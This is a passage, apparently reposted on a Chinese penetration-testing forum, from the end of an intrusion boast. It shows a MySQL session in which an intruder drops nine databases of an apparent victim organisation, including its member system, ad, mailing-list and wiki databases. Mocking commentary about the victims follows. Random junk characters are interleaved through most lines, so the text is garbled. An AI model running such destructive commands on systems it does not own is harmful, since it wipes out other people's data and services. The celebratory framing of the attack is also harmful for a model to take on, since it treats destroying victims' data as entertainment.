& b# A* ?: k9 ~14 rows in set (0.03 sec)

8 p1 z* Y, W6 D' d* T$ W5 gmysql> drop database astanet_membersystem;
# ^: O5 q: P- j# s( @droQuery OK, 46 rows affected (0.81 sec)
# \  L; e# B' E, ^" [+ {) a7 \
9 g9 Y* E3 S% `. W3 ]0 B! \mysql> drop database com_contrexx;
/ w- n) h* s4 M! Q" ]( h; b2 wQuery OK, 211 rows affected (2.72 sec)

* p% u# g( ^5 C# {6 ~  b4 emysql> drop database com_contrexx2;
Query OK, 237 rows affected (2.23 sec)

mysql> drop database com_contrexx2_live;
6 _. r7 y/ K- U/ R( D2 [Query OK, 227 rows affected (7.63 sec)
: [4 o- E, J9 Z/ E; z4 \; W2 @1 ?
mysql> drop database ideapool;
% d, k7 }' B8 Z6 S7 A9 }Query OK, 69 rows affected (0.19 sec)
& Q" l9 z% F4 `
mysql> drop database yourmaster;
Query OK, 158 rows affected (0.55 sec)
$ M5 Q, m' ~9 T+ ?  x( N
" w# q' x/ a8 D) zmysql> drop database astanet_ads;
Query OK, 9 rows affected (0.11 sec)
) c  e. P5 T* d) W- d. W
- R, L' X/ o& m7 B" Dmysql> drop database astanet_mailing_lists;
Query OK, 24 rows affected (1.47 sec)
4 W: ~0 }/ I) ?8 m7 u
mysql> drop database astanet_mediawiki;
Query OK, 31 rows affected (0.51 sec)
  _5 @* g! r. Y& V6 R9 V, j. p% n
mysql> show databases;
+——————–+
| Database           |
+——————–+
& w( P. D. X$ G| information_schema |
| da_roundcube       |
7 j6 A$ ^& m+ d! Z| dolphin            |
( j# F: t+ x3 u+ U) L. c5 ?8 E| mysql              |
| test               |
  u$ \2 {5 f) K& z  g" z0 {8 f+——————–+
5 rows in set (0.00 sec)

3 B- ]# }8 J) z& ~- n" G7 {, r% BWhat a journey! We’re not sure exactly why the “Terminator” had any influence on
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
% `8 T. U0 Z+ F1 J3 G7 L1 j! g& Ywrong to say this pack of morons *wont be back*.
! {: O0 P( l* n2 n+ o* q8 J

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2